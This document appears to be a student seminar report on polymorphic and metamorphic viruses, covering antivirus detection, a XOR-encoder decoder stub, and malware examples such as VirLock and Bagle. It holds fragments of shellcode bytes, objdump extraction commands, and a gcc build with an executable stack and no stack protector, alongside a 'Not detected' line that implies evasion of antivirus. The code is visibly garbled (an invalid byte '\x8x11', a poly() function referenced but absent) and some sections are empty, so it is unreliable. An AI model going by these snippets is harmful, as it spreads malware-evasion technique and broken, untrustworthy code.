Professional Documents
Culture Documents
“Polymorphic virus”
A Technical Seminar Report Submitted in partial fulfillment of
BACHELOR OF TECHNOLOGY
in
(16MH1A0587)
Under the esteemed guidance of
Dr. B. ANNAPURNA
2016-2020
ABSTRACT
Index
Security: virus & prevent
->How does anti-virus detect viruses?
->detection methods
->Heuristic analysis
->working of heuristic analysis
Types of virus :
->Polymorphic Virus
- about polymorphic virus
- implementation
- examples
- metamorphic virus
- difference between polymorphic and metamorphic virus
SECURITY
Computer security, cyber security or information technology
security is the protection of computer systems from the theft of or
damage to their hardware, software, or electronic data, as well as
from the disruption or misdirection of the services.
Prevent:
to prevent we have to use some antivirus softwares (or) malware
software. keep Your Anti-Virus Software Up to Date. Run Regularly
Scheduled Scans with Your Anti Virus Software. secure Your
Network because most of virus spread from email in 2000 year
before most of computer are attacked due to macro virus.
Virus signature
A virus signature is the fingerprint of a virus. It is a set of
unique data, or bits of code, that allow it to be identified.
Antivirus software uses a virus signature to find a virus in a
computer file system, allowing to detect, quarantine, and
remove the virus.
Detection methods:
Decoder structure
The first is called the stub, and it’s the code responsible to
decode the second part, the payload. An example is a XOR
encoder, in which you xor the payload byte by byte with the
value 0xAA, and you then write the stub which will just run
through the payload, byte by byte, xor it with 0xAA, and
then execute the decoded payload.
For the sake of simplicity, the encoding of the payload is
usually done in a high level programming language, such as
Python, while the decoder, obviously being done in x64
assembly, because that’ll be the actual shellcode.
Note:-
“\x90\x6a\x3b\x58\x48\x2f\x73\x68\x6a\x6e\x53\x54\x5f
\x52\x54\x5e” are hexa decimal decoder.
The core of the code generation here is the poly (..) function
Output:
./encoder.py
# nasm -felf64 decoder.nasm -o decoder.o && ld decoder.o -o
decoder
Not detected
# ./encoder.py
# nasm -felf64 decoder.nasm -o decoder.o && ld decoder.o -o
decoder
# for i in `objdump -d decoder | tr ‘\t’ ‘ ‘ | tr ‘ ‘ ‘\n’ | egrep ‘^[0-9a-
f]{2}$’ ` ;
\xeb\x47\x48\x8b\x3c\x24\x48\x83\xc4\x08\x48\x89\xfb\x8x11\x1b
# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
VIRLOCK:-
First Self-Reproducing Ransomware is also a Shape Shifter.
Win32/VirLock is ransomware that locks victims’ screens
but also acts as parasitic virus, infecting existing files on
their computers. The virus is also polymorphic, which
makes it an interesting piece of malware to analyze. This is
the first time such combination of malware features has
been observed.
URSNIF:-
BAGLE:
Bagle (also known as Beagle) was a mass-mailing
computer worm affecting Microsoft Windows. The first
strain, Bagle. A, did not propagate widely. A second
variant, Bagle. B, was considerably more virulent.
Metamorphic virus:
A metamorphic virus is a type of malware that is capable of
changing its code and signature patterns with each
iteration. Metamorphic viruses are considered to be more
advanced threats than typical malware or even
polymorphic viruses.